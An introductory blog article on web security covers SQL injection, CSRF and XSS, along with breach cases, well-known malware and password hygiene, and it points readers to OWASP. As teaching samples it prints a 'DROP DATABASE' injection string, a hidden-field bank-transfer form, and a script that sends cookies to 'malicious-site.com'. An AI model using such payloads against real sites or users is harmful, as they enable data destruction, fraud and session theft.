The security of our web applications, or cybersecurity, plays a crucial role in the protection of sensitive data and in building user trust. In this article, learn about the most common types of attacks, the risks you may be facing, and how to avoid them.
In today’s world, where technology plays a fundamental role in our lives, web application security has become an undeniable priority.
Since we were born, we have had access to a tablet, mobile phone or computer and we spend hours and hours on the internet, a complex and interesting place, full of information and misinformation.
Today, we’ll explore how cybersecurity plays a crucial role in protecting sensitive data and building user trust.
In this article, I will explain a little more about the world we use so much, the internet, a world that is not without its dangers if we do not know how to protect ourselves!
The Current Landscape
You may be surprised but there are many websites that, as you read this, are full of vulnerabilities that an ill-intentioned person could try to explore.
It is not possible to say for sure how many websites are exposed, due to the extensive ecosystem and complexity of the web, but estimations can be made. A study carried out by the OWASP organization in 2021 showed that there is a high percentage of websites that are exposed to various types of attacks:
Image taken from: https://www.researchgate.net/figure/Percentage-probability-of-websites-vulnerable-by-different-class-of-cyber-vulnerabilities_fig1_279869021
Types of Attacks
SQL Injection – Injecting SQL Commands (Databases)
Imagine that we are the sole developers of a web page that sells shampoos. We have a database of 1.000.000 registered users and we appear in every fashion magazine in the country.
All goes well until the day it doesn’t. Unfortunately, we do not validate for SQL command injections and, when a less well-intentioned user goes to register, they put the following text in the “User Name” field: “DROP DATABASE IF EXISTS mydatabase;”
DROP DATABASE IF EXISTS mydatabase is an SQL command that, when executed, will completely delete the “mydatabase” database. From that point on, there is no going back. We have lost all the information we had on our beloved website and, consequently, our work.
Cross-site Request Forgery (CSRF)
This type of cyber attack happens when we access a malicious website, let’s call it A, and click on a link, making requests to website B. Here’s a concrete example:
Our friend sent us a suspicious link via WhatsApp. He sent the message “CLICK HERE TO GET BITCOIN FREE HACK!!”.
Within the website there is a big red button that says “CLICK HERE FOR MONEY”.
Hoping to become as rich as Elon Musk, we ended up clicking on the link.
The problem is that it had the opposite effect because the button will transfer all the money we have to another account. Here is the HTML of the link we just loaded:
<form action=”https://bank.com/transfer” method=”POST”>
<input type=”hidden” name=”toAccount” value=”PT501234″>
<input type=”hidden” name=”amount” value=”1000 €”>
<input type=”submit” value=”CLICK HERE FOR MONEY”>
</form>
Since we are logged into our bank, the website will think that we are the one making the request to make the transfer.
And with a simple click we are one step closer to becoming the next billionaire.
Is it clear why we shouldn’t click on random links on the internet?
Cross-site Scripting (XSS)
Imagine we have a successful blog with millions of readers, almost as good as KWAN’s blog . We have a comment system where a user can leave a comment on the blog.
Normal people write short comments like “I loved it”, “I found it quite interesting”.
But there are also people who write comments like:
<script>
var img = new Image();
img.src = ‘https://malicious-site.com/steal?cookie=’ + document.cookie;
</script>
This is javascript code, not a normal comment. But what’s the problem?
The comment has been recorded. Now, when a user tries to access the blog, the malicious script will load as a simple “comment”.
The problem is that the comment is javascript code. It will be executed in the user’s browser. Only God knows what happens next. But having unknown code being executed on a user’s computer can only be a bad sign…
In the example given you will send cookie information to “malicious-site.com”.
This is potentially dangerous because the cookie could contain the user’s session information, allowing the hacker to access their account. Ultimately, just because the site was not protected against script injection, anyone who opens the blog page will have their account compromised.
Well-Known Cases of Celebrities in the Technology Field
There are countless cases of websites that, in one way or another, have been compromised. Facebook, Twitter, GitHub, Yahoo, LinkedIn, just to name a few.
No one is protected from these types of situations, not even the ‘giants’ in the technology sector.
Facebook
In 2019, Facebook faced a HUGE leak of sensitive information, exposing up to 533 million users. The information ended up being exposed on hacking forums.
In 2021, attackers discovered an unauthenticated public API that provided information about LinkedIn users. They used it to scrape the information of more than 700 million users—about 92% of all LinkedIn users. This information was later put up for sale on the black market.
The Internet as a Weapon of War
Cyberattacks can have the same reach and cause as much damage as a weapon of war. The only difference is that there is no physical invasion of a country. There are countless reports of these attacks, and for those more interested in the subject, I will share the stories I found most interesting.
Stuxnet
Computer program used to undermine nuclear facilities (widely believed to have been made by the United States and Israel to attack Iran).
WannaCry
A program used to encrypt and make files on infected computers inaccessible. There have been cases of attackers infecting hospital computers and demanding ransoms in Bitcoin to remove the virus from the system. As a result, treatments were postponed, which jeopardized the health of patients.
Passwords and Authentications: be Careful!
Leaks
There is a very famous website that collects all the information from all the leaks that have been registered about the theft of sensitive information given a certain email: https://haveibeenpwned.com/
I advise you to take a look, as it is quite possible that a website you used as a child has been compromised and your password is for sale on the black market.
It’s not the end of the world, in most cases the password is hashed.
Passwords
There is also information on the most common passwords on websites. You can see this information at https://nordpass.com/most-common-passwords-list/ .
Filter by country, and you will find that the most common password in Portugal is “123456”.
Deezer
There is a music website called Deezer. This website has a subscription system where, by having a premium account, we can install the songs on our computer.
So far so good, the problem is that they failed to implement a key security principle: token expirations.
When we log in to the website, a token is saved in our browser – this is how the website knows whether we are authenticated or not.
All subsequent actions we take on the website, which may require authentication, will use this token as an authenticator.
The problem is that the Deezer token has an annual validity – this is not a good practice at all. The user can see and change this token. And if a user has access to another user’s token, it can be used to perform actions that require authentication, such as installing songs.
This is a genuine market where people sell tokens to access the premium version of the website.
Is could be easily solved if there was a systematic token change protocol to shorten the token’s validity.
Is There a Solution?
Of course, but it is something that needs to be worked on. As Bruce Schneier said, “security is a process, not a product”.
Cybersecurity is a constantly evolving area and there is no one-size-fits-all solution.
Our best friend? INFORMATION.
Following the best practices and security measures that exist is, without a doubt, the best step to take.
There are several sources of information on the topic, but the best known and most used is OWASP.
OWASP is a non-governmental organization dedicated to promoting software security. It offers tools, documentation, projects, and training that greatly assist in making us better professionals and help us defend against these types of problems.
There is also a top 10 of the most common vulnerabilities on websites, which is published by OWASP, and which I recommend all programmers dedicated to web development to read, the most recent being from 2021.
Cybersecurity: Types of Online Attacks & Best Practices – Final Considerations
In a world so dependent on the internet, having knowledge about cybersecurity is essential!
The current scenario reveals that many websites are still vulnerable, as indicated by studies, highlighting the urgency of implementing robust security measures. In fact, in this article we discuss notable cases of security breaches on well-known platforms, such as Facebook and LinkedIn, highlighting that even technology giants are not immune to these threats.
To address these ever-evolving challenges, I emphasize the importance of information and the critical role of OWASP as a valuable source of security guidelines and best practices.
As we continue to understand cybersecurity, I will delve even deeper into this topic on the next article. We will explore new threats, advanced protection techniques, and updates on cybersecurity trends. Be prepared to unlock the secrets of advanced cybersecurity practices and discover how to effectively protect your systems against evolving digital threats. For now, I recommend reading this article on DevSecOps .